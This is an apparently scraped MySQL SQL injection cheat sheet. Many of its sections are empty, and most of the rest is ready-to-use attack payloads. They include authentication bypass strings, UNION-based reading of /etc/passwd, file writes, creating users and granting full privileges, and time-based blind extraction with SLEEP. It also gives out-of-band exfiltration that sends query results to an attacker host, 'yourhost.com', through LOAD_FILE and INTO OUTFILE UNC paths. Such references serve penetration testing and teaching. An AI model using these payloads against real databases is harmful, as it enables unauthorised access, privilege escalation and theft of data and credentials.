MySQL SQL Injection Cheat Sheet
Initial Exploitation===Back to top===
| ||||||
Quick Detection===Back to top===
| ||||||
Blind SQL Injection (Time Based)===Back to top===
| ||||||
Line Comments===Back to top=== DROP sampletable;--DROP sampletable;# Username : admin'-- : admin' or '1'='1'-- SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password' This is going to log you as admin user, because rest of the SQL query will be ignored. | ||||||
Inline Comments===Back to top=== Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.*DROP/*comment*/sampletable
| ||||||
If Statements===Back to top=== Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately. MySQL If Statement *IF condition true-part ELSE false-part
| ||||||
String without Quotes===Back to top=== SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) This will return ‘KLM’. | ||||||
Bulk Insert===Back to top=== Insert a file content to a table. SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- | ||||||
Load File===Back to top=== ' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- SELECT LOAD_FILE(0x633A5C626F6F742E696E69)This will show the content of c:\boot.ini | ||||||
Command Execution===Back to top=== Possible with using UDF (user defined functions). http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz | ||||||
Create Users===Back to top=== CREATE USER username IDENTIFIED BY password; -- | ||||||
Drop Users===Back to top=== DROP USER username; -- | ||||||
Make User DBA===Back to top=== GRANT ALL PRIVILEGES ON *.* TO username@'%'; | ||||||
List Users===Back to top===
| ||||||
List Passwords===Back to top===
| ||||||
List Databases===Back to top===
| ||||||
Privileges===Back to top===
| ||||||
Getting user defined tables===Back to top=== SELECT table_name FROM information_schema.tables WHERE table_schema = tblUsers tblUsers -> tablename | ||||||
Getting Column Names===Back to top=== SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = tblUsers’ tblUsers -> tablename SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = username; find table which have a column called 'username | ||||||
Default Databases===Back to top===
| ||||||
Path of DB files===Back to top===
| ||||||
Time Based SQLi Exploitation===Back to top=== ?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1-- {INJECTION} = You want to run the query. If the condition is true, will response after 14 seconds. If is false, will be delayed for one second. | ||||||
Out of Band Channel===Back to top=== ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt') Writes data to your shared folder/file {INJECTION} = You want to run the query. |